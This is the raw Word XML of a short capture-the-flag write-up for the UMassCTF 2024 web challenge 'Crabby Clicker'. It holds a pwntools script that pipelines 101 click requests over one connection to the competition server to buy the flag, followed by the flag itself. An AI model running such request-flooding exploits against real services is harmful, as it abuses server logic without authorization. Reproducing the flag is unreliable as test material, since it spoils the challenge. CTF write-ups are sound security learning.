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503" w:rsidRDefault="00B73503" w:rsidP="00B73503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639"/>
        <w:gridCol w:w="7705"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B73503" w:rsidTr="00B735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3503" w:rsidRDefault="00B73503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B73503" w:rsidRDefault="00B73503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B73503" w:rsidTr="00B735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73503" w:rsidRDefault="00B73503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B73503" w:rsidTr="00B73503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3503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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B73503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3503" w:rsidRDefault="00B73503" w:rsidP="00B73503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UMassCTF</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73503" w:rsidTr="00B73503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3503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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B73503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3503" w:rsidRDefault="00B73503" w:rsidP="00B73503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B73503">
              <w:t>Crabby Clicker</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73503" w:rsidTr="00B73503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3503" w:rsidRDefault="00B73503" w:rsidP="00B73503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3503" w:rsidRDefault="00B73503" w:rsidP="00B73503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Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidTr="00B73503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3503" w:rsidRDefault="00B73503" w:rsidP="00B73503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3503" w:rsidRDefault="00B735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https://ctftime.org/event/2287/tasks/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73503" w:rsidTr="00B735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73503" w:rsidRDefault="00B73503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B73503" w:rsidRPr="00B73503" w:rsidTr="00B735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73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503">
            <w:pPr>
              <w:pStyle w:val="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1F2328"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B73503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I've created a new game called Crabby Clicker! It's a fun game where you click on a crab to get points. Once you get enough points, you can buy the flag!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73503" w:rsidTr="00B735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73503" w:rsidRDefault="00B73503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B73503" w:rsidTr="00B735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73503" w:rsidRDefault="00B73503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B73503" w:rsidRPr="00B73503" w:rsidTr="00B735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73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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73503">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="888888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# -*- coding: utf8 -*-</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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73503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from</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73503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pwn </w:t>
            </w:r>
            <w:r w:rsidRPr="00B73503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import</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73503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*</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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73503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context.log_level=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73503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'debug'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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73503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SERVER=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73503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"crabby-clicker.ctf.umasscybersec.org"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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73503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PORT=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73503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80</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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</w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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73503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payload=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73503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b"GET /click HTTP/1.1\r\n\r\n"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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</w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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73503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 = remote(SERVER, PORT)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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73503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for</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73503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i </w:t>
            </w:r>
            <w:r w:rsidRPr="00B73503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in</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73503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range(</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73503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0</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73503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, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B73503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101</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73503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):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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73503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p.send(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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</w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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</w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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73503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payload=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B73503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b"GET /flag HTTP/1.1\r\n\r\n"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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73503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p.send(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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73503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recv = p.recvall()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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73503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print(recv)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73503" w:rsidRPr="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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B73503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// UMASS{y_w0uld_u_w4nt_mult1p13_r3qu35t5}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B73503" w:rsidRDefault="00B73503"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73503" w:rsidTr="00B735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3503" w:rsidRDefault="00B73503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B73503" w:rsidTr="00B735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3503" w:rsidRDefault="00B73503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B73503" w:rsidTr="00B735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3503" w:rsidRDefault="00B73503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B73503" w:rsidTr="00B735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3503" w:rsidRDefault="00B73503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  <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B73503" w:rsidRDefault="00B73503" w:rsidP="00B73503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503"/>
    <w:rsid w:val="006C0B77"/>
    <w:rsid w:val="008242FF"/>
    <w:rsid w:val="00870751"/>
    <w:rsid w:val="00922C48"/>
    <w:rsid w:val="00B73503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94DD1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{479DB7C8-2BFB-4F35-B9EA-1E846CE6A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B73503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B73503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35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35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503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B7350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B73503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B73503"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a4">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00B73503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B7350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HTML0">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B735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7350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comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B73503"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B73503"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B73503"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B73503"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B7350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45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128</Words>
  <Characters>736</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>6</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>SPecialiST RePack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2024-06-29T19:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-29T19:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>